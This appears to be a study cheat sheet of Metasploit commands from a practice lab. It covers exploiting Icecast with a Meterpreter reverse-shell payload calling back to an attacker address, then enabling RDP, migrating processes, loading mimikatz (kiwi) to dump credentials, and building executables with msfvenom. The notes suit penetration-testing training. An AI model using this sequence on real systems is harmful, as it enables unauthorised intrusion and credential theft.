uses exploit-db (searchsploit queries the local copy of the archive)
searchsploit <search>
sudo msfdb init
msfconsole
msf> db_nmap <nmap commands>
msf> run post/windows/gather/checkvm
msf> run post/multi/recon/local_exploit_suggester # lists candidate local privilege-escalation modules for the session; it does not elevate privileges itself
msf> run post/windows/manage/enable_rdp
msf> use exploit/windows/http/icecast_header
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 10.4.5.126 # address of the testing host's own interface; find it with ip addr
msf> use icecast
msf> set RHOST 10.10.173.148
msf> run
# into meterpreter (jobs and sessions are msf> prompt commands; migrate onwards run inside the session)
jobs
sessions
sessions -i 1
migrate # move to another process
getuid
getprivs
sysinfo
load kiwi # Meterpreter extension that bundles a newer version of mimikatz
upload # file
shell
bg # background the session and return to the msf> prompt
proxychains
run<tab>
# create executable
$ msfvenom